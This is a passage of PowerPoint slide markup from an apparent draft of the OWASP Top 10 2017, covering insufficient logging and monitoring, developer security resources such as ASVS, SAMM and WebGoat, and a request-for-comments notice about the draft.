                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Attackers rely on the lack of monitoring and timely response to achieve their goals without being detected.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>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rgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>This issue is included in the Top 10 based on an </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                          <a:hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t>industry survey</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>One strategy for determining if you have sufficient monitoring is to examine your logs following penetration testing. The testers actions should be recorded sufficiently to understand what damages they may have inflicted.</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rgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Most successful attacks start with vulnerability probing. Allowing such probes to continue can raise the likelihood of successful exploit to nearly 100%. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">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464438156"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1143000"/>
          <a:ext cx="6858000" cy="7997672"/>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81000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
                        <a:t>Establish</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0" dirty="0"/>
                        <a:t> &amp; Use Repeatable Security Processes and Standard Security Controls</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="F9FBFD"/>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6166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r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Whether you are new to web application security or are already very familiar with these risks, the task of producing a secure web application or fixing an existing one can be difficult. If you have to manage a large application portfolio, this task can be daunting.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00" baseline="0" dirty="0">
                        <a:latin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aseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>To help organizations and developers reduce their application security risks in a cost effective manner, OWASP has produced </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>numerous </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" u="sng" kern="1200" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>free and open</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" u="none" kern="1200" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>resources that </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>you can use to address application security in your organization. The following are some of the many resources OWASP has produced to help organizations produce secure web applications and APIs. On the next page, we present additional OWASP resources that can assist organizations in verifying the security of their applications and APIs.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900" baseline="0" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>There are numerous additional OWASP resources available for your use. Please visit the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP Projects page</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>, which lists all the Flagship, Labs, and Incubator projects in the OWASP project inventory. Most OWASP resources are available on our </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>wiki</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>, and many OWASP documents can be ordered in </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>hardcopy or as eBooks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US"/>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2" name="Group 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-914400" y="2971800"/>
            <a:ext cx="8763000" cy="5029200"/>
            <a:chOff x="-914400" y="2971800"/>
            <a:chExt cx="8763000" cy="5029200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Rectangle 2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-914400" y="2971800"/>
              <a:ext cx="8763000" cy="5029200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Freeform 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="3070641"/>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en-US" sz="1000" kern="1200" baseline="0" dirty="0"/>
                <a:t>To produce a </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" u="sng" kern="1200" baseline="0" dirty="0"/>
                <a:t>secure</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0"/>
                <a:t> web application, you must define what secure means for that application. OWASP recommends you use the OWASP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0">
                  <a:hlinkClick r:id="rId7"/>
                </a:rPr>
                <a:t>Application Security Verification Standard (ASVS)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0"/>
                <a:t>, as a guide for setting the security requirements for your application(s). If you’re outsourcing, consider the </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0">
                  <a:hlinkClick r:id="rId8"/>
                </a:rPr>
                <a:t>OWASP Secure Software Contract Annex</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0"/>
                <a:t>. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0"/>
                <a:t>NB</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0"/>
                <a:t>: T</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
                <a:t>he annex is for US contract law, so please consult qualified legal advice before using the sample annex. </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Freeform 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="2974010"/>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r>
                <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0"/>
                <a:t>Application Security Requirements</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Freeform 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="4085260"/>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defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>Rather than retrofitting security into your applications and APIs, it is far more cost effective to design the security in from the start. OWASP recommends the </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                  <a:hlinkClick r:id="rId9"/>
                </a:rPr>
                <a:t>OWASP Prevention Cheat Sheets</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0"/>
                <a:t> and the</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0">
                  <a:hlinkClick r:id="rId10"/>
                </a:rPr>
                <a:t>OWASP Developer’s Guide</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0"/>
                <a:t> as </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>good starting points for guidance on how to design security in from the beginning. The Cheat Sheets</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>have been updated and expanded significantly since</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t> the 2013 Top 10 was released.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Freeform 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="3988629"/>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kern="1200" baseline="0"/>
                <a:t>Application Security Architecture</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" baseline="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Freeform 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="5099878"/>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en-US" sz="1000" kern="1200" baseline="0" dirty="0"/>
                <a:t>Building strong and usable security controls is difficult. Using</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
                <a:t> a</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0"/>
                <a:t> set of standard security controls radically simplifies the development of secure applications and APIs. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0"/>
                <a:t>Many modern frameworks now come with standard and effective security controls for authorization, validation, CSRF, etc.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Freeform 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="5003248"/>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kern="1200" baseline="0"/>
                <a:t>Standard Security Controls</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" baseline="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freeform 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="6114496"/>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en-US" sz="1000" kern="1200" baseline="0" dirty="0"/>
                <a:t>To improve the process your organization follows when building applications and APIs, OWASP recommends the </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0">
                  <a:hlinkClick r:id="rId11"/>
                </a:rPr>
                <a:t>OWASP Software Assurance Maturity Model (SAMM)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0"/>
                <a:t>. This model helps organizations formulate and implement a strategy for software security that is tailored to the specific risks facing their organization. </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Freeform 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="6017867"/>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kern="1200" baseline="0"/>
                <a:t>Secure Development Lifecycle</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Freeform 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="7129115"/>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en-US" sz="1000" kern="1200" baseline="0"/>
                <a:t>The </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0">
                  <a:hlinkClick r:id="rId12"/>
                </a:rPr>
                <a:t>OWASP Education Project</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0"/>
                <a:t> provides training materials to help educate developers on web application security. For hands-on learning about vulnerabilities, try </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0">
                  <a:hlinkClick r:id="rId13"/>
                </a:rPr>
                <a:t>OWASP WebGoat</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0"/>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0">
                  <a:hlinkClick r:id="rId14"/>
                </a:rPr>
                <a:t>WebGoat.NET</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0"/>
                <a:t>,  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0">
                  <a:hlinkClick r:id="rId15"/>
                </a:rPr>
                <a:t>OWASP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" err="1">
                  <a:hlinkClick r:id="rId15"/>
                </a:rPr>
                <a:t>NodeJS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0">
                  <a:hlinkClick r:id="rId15"/>
                </a:rPr>
                <a:t> Goat</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0"/>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0">
                  <a:hlinkClick r:id="rId16"/>
                </a:rPr>
                <a:t>OWASP Juice Shop Project</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0"/>
                <a:t> or the </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0">
                  <a:hlinkClick r:id="rId17"/>
                </a:rPr>
                <a:t>OWASP Broken Web Applications Project</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0"/>
                <a:t>. To stay current, come to an </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0">
                  <a:hlinkClick r:id="rId18"/>
                </a:rPr>
                <a:t>OWASP AppSec Conference</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0"/>
                <a:t>, OWASP Conference Training, or local </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0">
                  <a:hlinkClick r:id="rId19"/>
                </a:rPr>
                <a:t>OWASP Chapter meetings</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0"/>
                <a:t>. </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Freeform 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="7032486"/>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kern="1200" baseline="0"/>
                <a:t>Application Security Education</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" baseline="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Textplatzhalter 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>+D</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Titel 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>What’s Next for Developers</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"/>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445800" y="1310640"/>
            <a:ext cx="3852337" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Important Notice</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="9" name="Table 8"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3789591431"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="609600" y="2286000"/>
          <a:ext cx="5657968" cy="3985260"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="5657968">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Request for Comments</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270344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dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>This version is not a final draft.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50" baseline="0" dirty="0">
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The first release candidate received a great deal of push back, which caused a leadership change, involving the community in re-evaluating what the OWASP Top 10 is, the methodology, the data collection and analysis, and how we provide transparency and governance over the project. Most of all, the push back showed us how much passion the community has for the OWASP Top 10, and thus how critical it is for OWASP to get the Top 10 right for the majority of use cases.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50" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>We have worked extensively to validate the methodology, obtained a great deal of data on over 114,000 apps, and obtained qualitative data via survey by 550 community members on the two new categories – insecure deserialization and insufficient logging and monitoring.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50" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>We strongly urge for any corrections or issues to be logged at GitHub</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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" marR="0" indent="-82800" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId3"/>
                        </a:rPr>
                        <a:t>https://github.com/OWASP/Top10/issues</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>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50" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Through public transparency, we provide traceability and ensure that all voices are heard during this final month before publication.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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" marR="0" indent="-82800" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Andrew van der Stock</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
